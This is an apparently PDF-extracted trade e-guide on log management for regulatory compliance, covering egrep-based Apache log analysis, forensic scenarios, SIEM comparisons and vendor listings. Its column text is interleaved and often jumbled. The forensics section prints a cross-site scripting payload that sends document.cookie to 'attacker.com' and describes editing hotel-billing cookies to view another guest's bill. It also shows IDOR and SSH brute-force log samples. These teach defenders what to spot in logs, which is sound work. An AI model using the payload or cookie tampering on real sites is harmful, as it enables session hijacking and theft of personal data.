Professional Documents
Culture Documents
log
2 Compliance
11 Analysis
17 Forensics
24 SIEM Alternative
29 Marketplace
management
Bound to regulations? Then you’re no stranger to log
management, and the importance of analyzing
the reams of data your devices produce.
BY INFORMATION SECURITY AND SEARCHSECURITY.COM
S P O N S O R E D BY
Log management
Regulatory compliance hard to get lenges, from the Fortune 500 company to
through? Automated tools help the small retail chain to the regional hospital.
you get out of the woods. Automated log management products (and
managed services) can provide considerable Numerous
relief. Let’s examine log management’s regulations have
R
challenges and how these tools can help required and/or
your organization cut them down to size.
egulations are requiring organi-
implied log
zations to collect, store and—per- GETTING ABOVE THE TREES management
haps most challenging—review Numerous regulations have required requirements.
and act on log data, on an and/or implied log management require-
unprecedented scale. In the past, ments. A well-defined program, however,
your network admins probably will help you meet these requirements
plowed through logs to track down device across the board. Broadly, there are a
issues, and they helped your incident number of core requirements you should
response teams get to the heart of a be prepared to address for all regulations.
suspected breach or other serious issue. Collection and Retention. Depending on
PCI, HIPAA, GLBA, SOX and other regs the regulation, you’ll typically need to keep
have changed this dramatically. Log man- logs at least a year, and, in many cases, up
agement now presents enormous chal- to seven years. This means not only logs
from network and security devices like thing about security issues, not just record-
routers, switches, firewalls and IDSes, but ing them. Your logs should reflect that every-
databases and applications that are within thing from firewall misconfigurations and
scope of the regulations that apply to your antivirus updates to improper user behavior
organization. is addressed.
Your logs should
Audit Trail. Logging has to be set to an This means laying a foundation of detailed
appropriate level, so your admins or security requirements. reflect that every-
analysts can track who did what to and from “Our requirements dealt way down in thing from firewall
which system, and, of course, satisfy auditor weeds,” said Matt White, security engineer, misconfigurations
questions. information security and compliance, for a and antivirus
Monitoring. You can’t just collect, store large retailer, which uses SenSage. “We updates to
and forget your logs. You will have to moni- wanted to look at things like time of day
tor them, generally at least daily, and demon- access for offshore folks, what select state-
improper user
strate to the auditor’s satisfaction that you ments were being executed against databas- behavior is
are actually doing that. es that contained cardholder data, exception addressed.
In addition to obvious review of network reporting based on lists of authorized known
and security device logs, the overriding users, people who are supposed to have
theme across regulations is to monitor access versus people who aren’t. We want-
user activities. Make sure you know who ed to differentiate between service accounts
has access to what resources. and operating system accounts versus
“The normal one everyone thinks of is these individual users, and audit them separately.”
users who had access to this given informa- Integrity/Chain of Custody. You’ll need
tion at this time, but there are a whole set of to demonstrate that the logs and, the infor-
requirements surrounding identity and access mation they contain, have not been altered or
management that you can only prove if you viewed/compromised by the wrong people.
have logs available,” said Richard Mackey,
vice president, SystemExperts. TALL TIMBER
Remediation. The spirit of all these regu- Log management is not easy and it is not
lations is that you are actually doing some- cheap. There are no shortcuts, and expect
to invest man-hours and money in process in standard syslog format. That’s the good
and policy, infrastructure, implementation news. But Windows Events logs are not.
and ongoing execution. If you fall short, the Nor are a number of very popular network
auditors will ring you up. There are signifi- and security devices and tools, applications
cant obstacles to deal with, which make log and databases. That’s before you even start
There are signifi-
management difficult. These problems multi- to consider proprietary applications devel-
ply with mergers and acquisitions, and new oped in-house. Imagine building parsers for cant obstacles to
business initiatives, systems, applications. each format and running regular expressions deal with, which
Logs, logs everywhere. You have two to query each, or dumping everything into a make log manage-
choices. You can collect and review logs relational database and running SQL ment difficult.
on each individual system, or find some queries to get what you need. These problems
way to collect all of them to a central loca- “A real showstopper was all the various
tion. Clearly, having a centralized repository log sources we had across the board,” said
multiply with
offers enormous advantages towards devel- White. “Everything from operating system mergers and
oping an efficient program, but it’s no sim- logs from Windows, Solaris and Linux to acquisitions, and
ple matter. You can set up a syslog server, network logs coming from IDS, firewalls and new business ini-
which will handle a number of logs, but not RADIUS. We wanted to do some database tiatives, systems,
all. Automating continuous log collection logging on Oracle and SQL Server, some
applications.
from disparate systems is a formidable HP 3000, IIS, Apache, MS ISA proxy logs—
challenge. the list goes on and on. It would have
Systems slowdown. Turning logging up to become a never-ending development effort.”
levels required by regulations and shipping Logs by the petabyte. The volume of logs
them off will smack your devices and net- generated by all these systems is stagger-
works with a significant performance hit. ing. Even a relatively small organization can
Be prepared to invest in infrastructure to generate terabytes of data that need to be
meet these demands. Are you prepared stored for prolonged periods. And, by the
to compromise the performance of your way, you’ll need some reasonable way to
firewalls, proxies and production servers? retrieve them.
Format smorgasbord. Many logs are “Managing the volume of data, that was
the biggest problem,” said White. “We have proper analysis, you can’t generate a lot of
a relatively small IT staff for a large retailer, useful reports that span systems and appli-
with a lot of off-shore development.” cations.
Keeping watch. Even if you overcome the Is it safe? There are a fistful issues here.
collection and storage issues, when will your You need to secure the log data, which can
Determining
business, network and security folks find the contain sensitive data. This means you have
time to sort through it all and monitor the to consider encryption, which presents its the appropriate
“good stuff” for relevant events and policy own set of headaches. You should ensure logging level
issues? the integrity of the data, both in transit and to turn on is
“Most organizations we see do a good at rest. Finally, you have to provide appropri- problematic for
job of capturing information,” said Mackey, ate access to the log data while maintaining each system
but because of the distribution and the proper separation of duties. There’s no clean
complexity, and the volume of logs, they way to do this in a centralized log collection.
and application.
don’t do a good at all of reviewing logs.” Caution: Logs may contain sensitive data,
Making sense of it all. How do you wade such as credit card numbers. This is typically
through the volume of log data, multiple an application security hole that doesn’t
formats and disparate systems to draw show up until you crank up the logging level.
useful intelligence and actionable informa- How much is enough? Determining the
tion? You may or may not have people who appropriate logging level to turn on is prob-
understand both the language and potential lematic for each system and application. If
issues of a particular system, who can it’s too low, you don’t have enough informa-
decipher that inscrutable log and figure tion. If it’s too high, you add unnecessarily to
out something is wrong, but making queries your already considerable performance and
across systems to get a better picture of storage burdens.
what’s going on is almost impossible. Can’t we all get along? Coordinating all
Reporting. Individual systems, by the this is a huge challenge, especially across
same token, may or may not have robust large, complex, distributed enterprises. “The
reporting capabilities that will be useful for hardest problem is getting people to work
internal inquiries and auditors. And, without together,“ said Mackey, “making sure the
organizations responsible for the applica- Analysis. Once you can centralize logs
tions and the logs are going to allow that and run queries across systems and applica-
data to be shared.” tions, regular monitoring becomes feasible.
Analysts and admins can review logs for
CLEARING THE WAY security, compliance, operational issues,
“Without log
Automated log management tools using a central console. These tools have
change the equation. built-in components to facilitate analysis management
“Without log management tools, it’s and often include compliance packages tools, it’s almost
almost impossible to do a good job of meet- that map log data against specific regulatory impossible to
ing regulatory requirements,” said Mackey. requirements. They make incident response do a good job of
While log management products and and forensics far easier. Human beings are meeting regulatory
services aren’t exactly plug-and-play, they still required, however.
address the most pressing obstacles. “As much as this has been automated, it
requirements.”
Centralization. With built-in collectors, hasn’t gotten to the point that people don’t —Richard Mackey,
vice president,
log management products solve the problem have to look at it,” said Mackey. “Log man- SystemExperts
of dealing with each system, database and agement tools make it possible for someone
application as an island. Centralizing the who understands logging associated with
logs makes the storage issue easier to each of these components to look at it and
tackle, while keeping the logs available for understand it. But they don’t automate the
reporting, forensics and auditing. You can recognition of anything that happens to be
manage your storage requirements more important.”
easily than adding space to individual Event management. While they are not
systems, and control costs and charge-back security information/event management
to departments and business units. (SIEM) tools, log management products
Normalization/correlation. Log manage- often have some automated alerting capa-
ment products understand a wide variety of bility, based on known issues and/or user-
log formats, and normalize them into a com- defined rules. Some organizations will use
mon format and correlate so that you can them as “SIEM light,” if they can’t invest in
run queries for information across systems. SIEM. Also, they can sometimes be inte-
grated with SIEM tools from the same or planning and a thorough understanding of
third-party vendors. your enterprise. Anticipate a phased imple-
Value added. Log management can save mentation and plan for growth.
time and money beyond compliance or even Get a win. Start with logs that are most
security. Many organizations review logs to critical for compliance and, if possible, areas
“If you perform
troubleshoot network and other IT issues. If that your vendor handles particularly well.
you can cut the time needed to troubleshoot SystemExperts’ Mackey recommends start- duties in a third of
a problem from, say 10 minutes to two, you ing with perimeter devices, for example, to the time, or gener-
can show some real ROI. help comply with the PCI requirement to ate information in
“There’s a business case justification. If install and configure firewalls and protect half the time, you
you have the ability to report on different cardholder data. However, understand that can make a great
metrics and report with consistency,” said it’s just the start.
Todd Zambrovitz, Symantec senior product Matt White started with an important
internal business
marketing manager customer database application for his retail case.”
“If you perform duties in a third of the time, company, but after months of development —Todd Zambrovitz,
or generate information in half the time, you on a single project, he would do it differently senior product marketing
manager, Symantec
can make a great internal business case.” if he were starting again.
“We log for things not PCI-oriented,” said “Our initial approach was to deploy it by
Eric Laszlo, senior manager, information tech- application. I would have taken an approach
nology, at Redcats USA, a LogRhythm cus- of deploying it by technology across the
tomer. “Network segments that have nothing operating system install base: Windows
to do with credit cards or order entry. We uti- security event logs, Unix syslog, relatively
lize it on switches and routers as well as for low effort and quick wins. Once you get the
sever infrastructure more for trouble-shooting.” operating systems done, determine your
database level reporting requirements
WATCH YOUR STEP across the board and move that up from
Log management tools make life, easier, level to what you need to get to application-
but that doesn’t mean they’re always easy. level logs.”
A successful deployment requires careful Coordinate. “Like all activities within a
corporation, it’s a strange mix of technical Assess your needs. Starting with the “Like all activities
versus organizational and the financial you regulatory requirements, determine what within a corpora-
always have to keep in mind,” said Mackey. logs you actually need to collect, how often
“Small organizations can make decisions you need to review them, what reports are
tion, it’s a strange
quickly, but large enterprises require time to required and what your auditors will look for. mix of technical
coordinate activities, from log feeds, access Create a baseline of events you want the versus organiza-
permissions, lines of reporting, allocating system to look for. tional and the
storage, and assigning budget.” Establish what systems house relevant financial you
Standardize. Choose one product as the and get a handle on log data those systems always have to
standard for your organization and develop generate, as well as the network infrastruc-
consistent policies around it. ture that accesses those systems. m keep in mind.”
Get help. Your organization may not have —Richard Mackey,
vice president,
the expertise, at least for initial deployment. SystemExperts
Large consulting firms can help you get Neil Roiter is senior technology editor at Information
started. But, warns Mackey, don’t become Security.
addicted to the services.
ALTERNATIVE
SHOPPING TIPS
I
to perform fast, advanced searches against is how do you
large amounts of text data. There are a few sift through log
variations of regex formats, the most com-
t seems every new device, appliance and monly used by scripting languages are called data and find
even desktop software program has the Perl-derivative regular expressions. These relevant security
capability to generate logs or text-based include regex formats for .NET framework, information?
data. There are a number of challenges Python, Java, JavaScript, and of course, Perl.
associated with managing the onslaught By using this type of regex in combination
of log data. with any scripting language or search tool,
The first is centrally storing and gathering you can quickly and efficiently parse large
these logs; luckily, there are a number of amounts of data for meaningful information.
solutions for this. Logs are usually shipped One of the most common log formats we
off to a syslog, log management or SIM tend to see issues in is Apache, or httpd.
system that is centrally located in the net- These Web logs tend to hide a number of
work. So the big question is how do you sift secrets that are vital to find, such as attack
through log data and find relevant security attempts, successful attack signatures, and
information? even precursor activities to an impending
Although there are many different open- attack.
source and commercial software applications We will focus on the use of regex with
that perform some level of log analysis, one egrep. Egrep uses a very simple syntax for
Breaking down our result, on line 57 of the STEP 3: REFINE YOUR SEARCH
log file, a request was made at 8:44 p.m. on It may be of interest to search for other
Oct. 10 to our Web server, requesting the requests by Bob, specifically ones that
Webmin directory. We can also see that the returned a 200 code, to indicate that he
server returned a 404 message, indicating found something. Our command could
“200” and that is what we asked for. Using [10/Oct/2000:20:25:35 -0700] “GET /login
regex can often cause false positives, but HTTP/1.0” 404 726
using our simple query, we were able to 120:10.10.10.10 - [10/Oct/2000:21:14:11
eliminate most of them. -0700] “GET /index.html HTTP/1.0” 200
Lets investigate Bob a little further. 2571 When looking for
STEP 4: FOLLOW THE TRAIL 157:10.10.10.10 - [10/Oct/2000:21:50:59 more dangerous
As a last-ditch effort to track all of Bob’s -0700] “GET /parent/directory HTTP/1.0” attack indicators,
activities, we can search for all requests that 404 726 keep an eye out
Bob made from his IP address. This requires 260:10.10.10.10 - [10/Oct/2000:22:25:15 for the frequency
escaping the periods in the IP address as -0700] “GET /support.htm HTTP/1.0” 200 and destination
part of the regex. Escaping is a method of 1056
telling a regex engine that instead of using
of the request.
the special meaning for a character, we So now we have a pretty good idea that
want to use it as a literal search. Note the bob is poking around the site, but hasn’t
command below: necessarily violated any laws or crossed any
>egrep –n –i “10\.10\.10\.10” access_log boundaries. But, it’s a good idea to continue
to watch for logs containing this information.
In this case, we are telling egrep to find
all instances of 10.10.10.10 in the log file. EVER ALERT
Our results will look much like this: When looking for more dangerous attack
57:10.10.10.10 - bob indicators, keep an eye out for the frequency
[10/Oct/2000:20:24:18 -0700] “GET /web and destination of the request. For example,
min HTTP/1.0” 404 726 when monitoring an online banking applica-
59:10.10.10.10 - bob tion, keep a particularly close eye on
[10/Oct/2000:20:24:59 -0700] “GET requests sent to transfers. For example, we
/admin HTTP/1.0” 404 726 may see several of these when someone is
trying to view other’s transfer records:
65:10.10.10.10 - bob 10.10.10.10 - [10/Oct/2000:x:x:x -0700]
“GET /banking/view/transfer.jsp?id=12345 Here we can see where someone noticed This is a serious
HTTP/1.0” 200 1042 the ID=xxxxx in the URL and tried increment- breakdown in the
ing the number by one until they found other
10.10.10.10 - [10/Oct/2000:x:x:x -0700]
transfer records. This is a serious breakdown
security of the
“GET /banking/view/transfer.jsp?id=12346 Web application
HTTP/1.0” 500 798 in the security of the Web application and
most certainly something you will want to and most certainly
10.10.10.10 - [10/Oct/2000:x:x:x -0700] catch when analyzing your logs. m something you will
“GET /banking/view/transfer.jsp?id=12347
want to catch
HTTP/1.0” 200 1042
Brad Causey is a senior security analyst, author, and
when analyzing
10.10.10.10 - [10/Oct/2000:x:x:x -0700] your logs.
web security engineer. He holds the following certifi-
“GET /banking/view/transfer.jsp?id=12348 cations; MCP, MCDST, MCSA, MCDBA, MCSE,
HTTP/1.0” 500 798 MCT, CCNA, Security+, Network+, A+, CTT+, IT
Project+, C|EH, GBLC, GGSC-0100, CIFI, and
CISSP.
Are you enough of a sleuth to Ideally, you should try to pare down your
conduct a forensics investigation logs by a suspected time range, or be look-
on the reams of data your ing for particular IP addresses that don’t
organization’s logs contain? make sense, or actions that only administra- Commercial tools
tors would perform, such as changes to can help spot
Y
group policies. Multiple entries, such as for patterns and
unsuccessful login attempts, are another
sign of potential break-ins. It is also useful
correlate events,
ou are submerged in a sea of to employ commercial log management but it helps to
data about your network. Just tools or services, which can help spot hone your skills
about everything keeps nanosec- patterns and uncover some of these more by spending
ond-by-nanosecond log files and insidious events. some time
records of what is happening We asked some experts to share their
across your enterprise. The trouble is being
learning what
insight, and actual samples of data breaches.
able to find out that particular exploit among While we can’t reproduce everything for pri- to look for.
your intrusion detectors, firewall analyzers, vacy reasons, our examples provide enough
log parsers and other servers. of the event trace and log details to give you
You know that some vital evidence that a good idea of how to go about finding this
your network has been compromised could critical information. These examples are
be buried inside one of these repositories. only the tip of the iceberg, just like real log
So where to look? How to get started? analysis. Commercial tools can help spot
Let’s demonstrate some of the sleuthing patterns and correlate events, but it helps
techniques that you can use and patterns to hone your skills by spending some time
to watch out for. learning what to look for.
Windows servers produce lots of log data. In this case, the suspected problem was
For this case, we are using SenSage’s log Active Directory, and the IT staff determined
management tool to filter through all the data that someone had modified an Organization
and find the key events from the night before Unit the previous night. They found a series
that have to do with policy settings or groups of group policy change events, including the
In the Windows
of user accounts. Here is the telltale entry: one above.
In the Windows environment, the deletion environment, the
1192097062 2007-10-11 11:04:25 of group policy objects creates an event ID deletion of group
user.notice slon10p00022.ACME.ac- of 566 and it is logged for the policy object, policy objects
group.com MSWinEventLog 1 Secu- indicating the “Delete” access. creates an event
rity 1276931 Thu Oct 11 11:04:22 Using this report, this brokerage firm was ID of 566 and it
2007 566 Security msooky_g02 able to find the actual administrator who
User Success Audit SLON10P00022 made the change that caused the outage.
is logged for the
Directory Service Access Object It turned out to be a mistake and not a policy object,
Operation: Object Server: DS Opera- malicious activity. indicating the
tion Type: Object Access Object Type: “Delete” access.
%{bf967aa5-0de6-11d0-a285- Lesson learned: Many organizations limit
00aa003049e2} Object Name: the number of people who have access to
%{206138e6-cb3e-4f37-abbf- the corporate directory applications, and it
2c9a606145f8} Handle ID: - Primary is a wise idea to test any changes with a
User Name: SLON10P00022$ Primary normal user account once they have been
Domain: ACME Primary Logon ID: posted, to ensure that ordinary operations
(0x0,0x3E7) Client User Name: can continue.
clumsy_admin Client Domain: ACME
Client Logon ID: (0x0,0xF9EB2193) SCENARIO 3:
Accesses: DELETE Properties: TERMINATED EMPLOYEE
DELETE Additional Info: Additional GETTING ACCESS
Info2: Access Mask: 0x10000 We know that threats from the inside are
1276930 the most pernicious. In this scenario, we find
out that a terminated employee has gained aged to authenticate himself to the Cisco
access to the corporate VPN and is deleting VPN (either his account wasn’t terminated
critical data. This scenario isn’t just about when he was, or he managed to socially
missing data, but could also be used to engineer a help desk employee and gain
investigate other oddities. You would want to temporary access). We used enVision’s fil-
Somehow, the
search by employee, by time of day, multiple tering capability to look for recently unautho-
failed login attempts, or a combination of all rized users , or users who have tried to log in user DJohnson
three. Look at the captured packets, using with multiple unsuccessful attempts within a managed to
RSA’s enVision log analyzer, below. short time period. We can see in this exam- authenticate
Somehow, the user DJohnson (see first ple that he deleted a table (see highlighted himself to the
highlighted text in example, below) man- text at bottom of example) called “Cashflow,” Cisco VPN
(either his
“ciscovpn” “IKE/52” “2006-12-26 10:04:27.0”“VPN” “75.69.228.30” account wasn’t
“Auth.Successful.Methods” “djohnson” ““ “57138 12/26/2006 10:40:17.780 terminated when
SEV=4 IKE/52 RPT=407 75.69.228.30 Group [RSA] User [djohnson] User (djohnson) he was, or he
authenticated.”
managed to
“ciscovpn” “IKE/34” “2006-12-26 10:04:29.0” “VPN”““ “75.69.228.30” socially engineer
“Auth.Successful.Methods” “djohnson” ““ “57150 12/26/2006 10:40:19.150
a help desk
SEV=5 IKE/34 RPT=516 75.69.228.30 Group [RSA] User [djohnson] Received local IP
Proxy Subnet data in ID Payload: Address 0.0.0.0, Mask 0.0.0.0, Protocol 0, Port 0” employee and
gain temporary
“oracle” “CREATE” “2006-12-26 10:13:04.0” “DATABASE” ““ ““
“User.Activity” “djohnson” “DROP TABLE CASHFLOW” “%ORACLE-1-CREATE: access).
EVENTTIME: \Tue Dec 26 10:13:04 2006 \ VERSION: \Oracle9i Enterprise Edition
Release 9.2.0.4.0 \ OS: \SunOS\ SYSTEM: \sun4u\ NODE: \pltdb13m3\ INSTANCE:
\PLTUKWO1\ ORACLEPID: \143\ UNIXPID: \23965\ ACTION : \’DROP TABLE
CASHFLOW’ \ DATABASE USER: \djohnson\ PRIVILEGE : SYSDBA CLIENT
USER: djohnson CLIENT TERMINAL: STATUS: 0”
probably to cover his tracks to avoid discov- a user’s hard drive. The scenario is a user
ery of previous wrongdoing. examining his hotel bill online.
Typically, once a user authenticates him-
Lesson learned: Make sure you have self for the hotel billing system, the informa-
solid procedures for terminated employees, tion for his room is stored in a cookie. While
While you can
including training your help desk staff. you can search for the cookie files on your
hard drive, it is easier if you use a built-in search for the
SCENARIO 4: proxy server, such as Firebug for Firefox or cookie files on
HIJACKED USER SESSION IE Watch for IE, to observe what cookies are your hard drive,
We know the Web is an insecure medium, created as you connect to various websites. it is easier if you
but exactly how insecure? Here is a simple Here are the contents of part of the cookie use a built-in
way to demonstrate how to hijack user file, below.
session data by looking at the cookies on You’ll note that the cookie contains two
proxy server,
such as Firebug
for Firefox or IE
GET /nyaa/ui/i18n/en-US/Portal/view_bill.aspx?source=folio HTTP/1.0
Watch for IE,
Host: 127.0.0.1 to observe what
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9) cookies are
Gecko/2008051202 Firefox/3.0 created as
Cookie: ASP.NET_SessionId=ziaifh45ucmljv45rsreafzt; DMBINET=SESSIONID= you connect to
128566822773487500; CSS=DMBiNet_HIL.css; IMG=Hotel.jpg; MENUIMG=&ADVER various websites.
TIMG=&FOOTERIMG=&HOTELURL=http://www.blank.com&COR
PORATEURL=http://www.blank.com&PURCHASEIMG=Purchase_bkg_.jpg;
VlanID=483939474839028.412.593839; COUNTRY=US; LOCATIONID=LOC009;
LOCATIONNAME=Com; LOCATIONTYPE=GuestRoom;
MACADDRESS=0065F2D421EE; ACCOUNTNO=96113005; ROOMNO=412;
MIM_IP=127.0.0.1; MIM_PORT=7296; PMS_DESCRIPTION=Internet Broadband;
HOTELID=NIHKTMCA; HELPEMAIL=thhelp@blank.net;
elements that refer to room 412 (see high- cation security for HP, discusses this
lighted text, p. 21), where the guest stayed. exploit in a video presentation,
If you change both of these to another room, http://www.calebsima.com/israel-presenta-
such as 312, and save that cookie to your tion.html.)
hard disk and bring up the hotel billing appli- This code adds a special payload, so that
cation, you will be able to view another every time someone views this user’s profile,
Sometimes it isn’t
guest’s bill for that night. their information is sent in the background to just the log files
the attacker. This has the effect of being that are insecure.
Lesson learned: Sometimes it isn’t just able to infect everyone who views a particu-
the log files that are insecure. Poorly written lar user profile. Here is what our Web server
Web applications that place some user log file will look like:
identities in insecure files are also risky.
2006-08-31 19:54:47 0.0.0.0 GET /a.js -
SCENARIO 5: 80 – 0.0.0.0
CROSS-SITE SCRIPTING Mozilla/4.0+(compatible;+MSIE+6.0;+MS
OF A WEB SERVER NIA;+Windows+98;+.NET+CLR+1.1.432
Cross-site scripting vulnerabilities are all 2) 200 0 0
too common; Hackers can insert code it 2006-08-31 19:54:47 0.0.0.0 GET /
into the normal operations of Web servers pIDCode=2AD4A95012D09660 - 80 -
that don’t properly validate their inputs and 0.0.0.0
create all sorts of problems. Take a look at Mozilla/4.0+(compatible;+MSIE+6.0;+MS
this bit of JavaScript that can be typed into NIA;+Windows+98;+.NET+CLR+1.1.432
a normal input field of an online dating or 2) 404 0 2
social networking site that is expecting the
ordinary user to update his or her profile These are the actual cookie IDs of the
information: exploited users; the bold text is special
Document.write (“img src=http://attacker. Javascript code that can steal the informa-
com” + document.cookie +” width=0>“) tion that is typed in the browser. We are
(Caleb Sima, chief technologist for appli- now able to act as these users, we can even
change their account information or commu- This entry is repeated for literally thou-
nicate as if we were them. sands of times (see highlighted text,
The ultimate cross-site scripting exploit bottom left), and occurs over several days.
happened a few years ago with the Samy Then we see the following entry, showing
Myspace worm (described at the attacker finally got the correct password:
http://namb.la/popular/tech.html). The hack-
The ultimate
er managed to infect more than a million Apr 24 15:09:02 support sshd[2396]: cross-site
users in less than a day. Accepted password for root from scripting exploit
::ffff:216.167.115.236 port 17001 ssh2 happened a few
Lesson learned: Validate those inputs! years ago with the
Cross-site scripting is well known, and the Lesson Learned: Don’t have weak
Samy Myspace
fix is to better educate your application passwords, especially on SSH servers
developers to review their code for security that face the Internet. And just because worm The hacker
vulnerabilities. you have blocked all the relevant ports, managed to infect
you should still look for large numbers of more than a
SCENARIO 6: failed login attempts. m million users in
ROOT PASSWORD GUESSING less than a day.
We all can forget a password, but how
about a poorly crafted root password? Here David Strom is a freelance writer and professional
is an entry from one log file from log man- speaker based in St. Louis, He is the former editor-
in-chief of Network Computing magazine and Tom’s
agement company LogLogic’s archives: Hardware.com.
A
use of them. As with other security markets, tions have less
the appetite for SIEM has increased as data, but far less
regulatory pressures have grown.
t a large enterprise, security Log management is a little different sort
staff—the network
concerns and regulatory pres- of animal. In less demanding times, organi- admin may also
sures, often from multiple man- zations large and small might dig into their be the security
dates, force you to deal with logs as needed or as time allowed for inci- manager.
massive amounts of data from dent response, forensics and network oper-
network and security devices, databases, ations. Regulations like PCI-DSS, GLBA,
and applications. Often, this is more than HIPAA and SOX have changed all that, as
your network people, compliance staff and companies have to retain logs from myriad
security analysts can deal with efficiently. systems and applications, typically for up
Smaller organizations have less data, but to seven years, monitor them frequently
far less staff—the network admin may also (often at least once daily), and, oh, by the
be the security manager. But you may have way, demonstrate all this to the auditors’
to be concerned about PCI-DSS or HIPAA satisfaction.
or both. Mid-sized companies are twixt and This has been a windfall for log manage-
‘tween. ment vendors in what was a peripheral
At the high end, security information and market. Pure-play vendors are raking in
event management (SIEM) tools have histor- revenue they wouldn’t have dared hoped
ically addressed companies with complex for a few years ago. SIEM companies were
quick to take note of this business opportu- his company] at the time what it was they
nity, improving or at least doing a better job were looking for, SIM, something for
of marketing their log management capabili- database reporting or log management.”
ties. In several cases, major SIEM vendors Small wonder there’s been confusion.
have developed their own separate log One large SIEM vendor admitted that they
“PCI was the
management tools, bringing in big bucks were a little slow to recognize the growing
from previously untapped markets. demand as reports came back from their initial driver
At the same time, leading log manage- sales reps a few years ago that potential to search for
ment vendors have introduced some sophis- customers were asking just for log manage- products in SIM
ticated data analysis and real-time detection ment. They thought initially their reps needed and log manage-
capabilities that make them more SIEM-like. better training on how to sell their SIEM ment space—
One vendor referred to his company’s devel- product. After a few months, they realized
opment in this area as “SIM Light” (see “Log something was up.
when we started
Management & SIEM Vendors, p. 29). At their foundations, both log management process begin-
and SIEM tools apply some similar functions. ning of 2005.”
THE SAME, BUT DIFFERENT They need to collect logs from many dis- —Matt White,
Here’s the dilemma: Which technology is parate devices and applications, aggregate security engineer for
right for your organization? If you’ve already them in a central repository and normalize the information security
and compliance,
deployed SIEM, can that handle your log data from sundry different formats so you can
large retailer
management requirements, or do you need run queries across the data.
a dedicated tool? If you have neither, which They diverge somewhat in purpose and
do you buy? Do you need both? architecture. Log management tools address
“PCI was the initial driver to search for many key policy and compliance needs.
products in SIM and log management Without them, the pain points are excruciat-
space, when we started the process begin- ing: Your IT and security folks have to review
ning of 2005,” said Matt White, a SenSage logs for each system and application sepa-
customer and security engineer for informa- rately, and connecting the dots between
tion security and compliance for a large systems is pretty hopeless. Central storage
retailer. “I don’t know if it was really clear [to is a major headache. Monitoring for security
prise/small business dichotomy when it $30,000 to spend and don’t want to hear
comes to SIEM versus log management. about real-time threats because either you
Typical SIEM sales easily pass the are dealing with the auditor directly or some-
$100,000 threshold, and go well into seven one on the compliance side, or the tech guy
figures for larger organizations. Log manage- you are dealing with is getting beaten up by
Price, of course,
ment products more typically will cost maybe auditor. That’s what they are trying to solve.”
$10,000 to $20,000, though large deploy- While regulatory compliance is mandatory, is key to the
ments can run up into the hundreds of and security is always tough to justify from a large enterprise/
thousands. cost perspective, there are a number of use small business
Matt White, for example, said the initial cases that make the ROI easier. dichotomy when
budget of $100,000 for SenSage’s log “The driver for logging is compliance, 100 it comes to
management product at his large retail percent,” said General Dynamics’ Garner,
company was way off the mark as they start- “but you get buy-in across enterprise from
SIEM versus
ed to get RFP responses. He quickly got an business owners, network support teams log management.
increase to $350,000 for the IT infrastruc- and security teams for the value the logging
ture portion of the implementation. SIEM data gives them.”
tools either couldn’t meet his reporting Automated products can be invaluable for
requirements or priced themselves out of mining business data and enabling network
the running. One SIEM vendor quoted $1.7 operations teams and help desks quickly
million, another $2.7 million. “It was crazy,” identify and remediate problems, saving
he said. man hours and money.
“We were hearing a lot from the cus- Managed services, which are finding their
tomers we weren’t getting, because our way into every security market, are a relative-
solution was way overkill for what they were ly inexpensive option. Providers can typically
looking for,” said Tracey Hulver, executive VP offer log collection and forensics, as well as
for product marketing and management for monitoring. They can handle the storage/
NetForensics, which has a logging product retention requirements, depending on the
to complement its SIEM offering. organization’s willingness to allow the data
“A lot of companies only have $20,000- off-site.
MARKETPLACE
This market features a number of SIEM vendors, some of which have introduced their own log manage-
ment products, in addition to pure-play log management vendors.* In addition, many managed service
providers, such as SecureWorks, Savvis, BT and Verizon Business offer services based on some of
these products.
The Essentials Series: PCI Compliance Simplifying Log Collection, Storage and Analysis
Capture and analyze all log data in a compressed, cost-effective and self-managing
log repository.
LogLogic Simplifying Global Log Management at Rockwell Automation Learn how LogRhythm can help automate compliance for PCI-DSS,
Case study on simplifying log management at Rockwell Automation. HIPPA,SOX, GLBA, NERC-CIP.
Weekly Live Product Demo on Log Management Schedule a 30 minute demonstration with a LogRhythm expert.
Join our product team every Tuesday for a live demo and Q & A of LogLogic.
See the 4 minute LogRhythm overview and high level product demonstration.
The SANS 2008 Log Management Market Report
The SANS Institute 2008 survey on Log Management.
Splunk
Splunk > The IT Search Engine
Learn how you can use the Splunk IT Search Engine for Security and Compliance.